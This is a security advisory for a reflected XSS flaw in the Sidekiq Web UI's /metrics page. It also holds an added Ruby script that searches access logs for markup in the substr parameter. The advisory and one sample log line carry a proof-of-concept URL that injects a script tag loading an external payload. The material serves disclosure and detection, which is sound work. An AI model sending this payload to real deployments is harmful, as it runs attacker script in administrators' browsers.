CVE-2024-32887 (sidekiq): Reflected XSS in Metrics Web Page

Ruby Security Advisory

Reflected XSS in the Sidekiq Web UI via the `/metrics` HTTP endpoint and the
`substr` query parameter:

https://{host}/sidekiq/metrics?substr=foot%22%3E%3Cscript%20src=%22{payload}%22%20/%3E
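
To check whether requests of this shape have reached a deployment, the following added example (not part of the advisory or of Sidekiq's code) scans access-log lines for a `substr` parameter on a `/metrics` path whose decoded value contains HTML markup characters. It assumes combined-log-format request lines and matches any path ending in `/metrics`, since the Web UI mount point varies; the sample log lines are constructed.

```ruby
require "uri"

# Characters that let a reflected value close an attribute or open a tag.
MARKUP  = /["'<>]/
REQUEST = /"(?:GET|HEAD) (\S+) HTTP/

# Constructed sample access-log lines, not taken from a real system.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [01/May/2024:10:00:01 +0000] "GET /sidekiq/metrics?substr=Mailer HTTP/1.1" 200 5120
  203.0.113.9 - - [01/May/2024:10:00:05 +0000] "GET /sidekiq/metrics?substr=foot%22%3E%3Cscript%20src=%22{payload}%22%20/%3E HTTP/1.1" 200 5230
  203.0.113.9 - - [01/May/2024:10:00:09 +0000] "GET /sidekiq/metrics?foo=1&substr=a%2522%253E HTTP/1.1" 200 5100
  203.0.113.4 - - [01/May/2024:10:00:12 +0000] "GET /sidekiq/queues?substr=%3Cb%3E HTTP/1.1" 200 900
LOG

# Percent-decode repeatedly (bounded) so double-encoded values are seen in clear.
def fully_decode(value, rounds = 3)
  rounds.times do
    decoded = URI.decode_www_form_component(value)
    break if decoded == value
    value = decoded
  end
  value
rescue ArgumentError # malformed %-escape: keep the last form that decoded cleanly
  value
end

# Returns the decoded substr value of every request to a path ending in
# /metrics whose substr parameter carries markup characters.
def suspicious_substr(log)
  log.each_line.filter_map do |line|
    target = line[REQUEST, 1] or next
    path, query = target.split("?", 2)
    next unless path.end_with?("/metrics") && query
    # Split by hand: the page's URL contains "{payload}", which URI.parse rejects.
    pair = query.split("&").map { |p| p.split("=", 2) }.find { |k, _| k == "substr" }
    value = fully_decode((pair && pair[1]).to_s)
    value if value.match?(MARKUP)
  end
end

puts suspicious_substr(SAMPLE_LOG) if __FILE__ == $PROGRAM_NAME
```

A hit only shows that such a request was received; whether the value was reflected unescaped depends on the Sidekiq version that served it.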
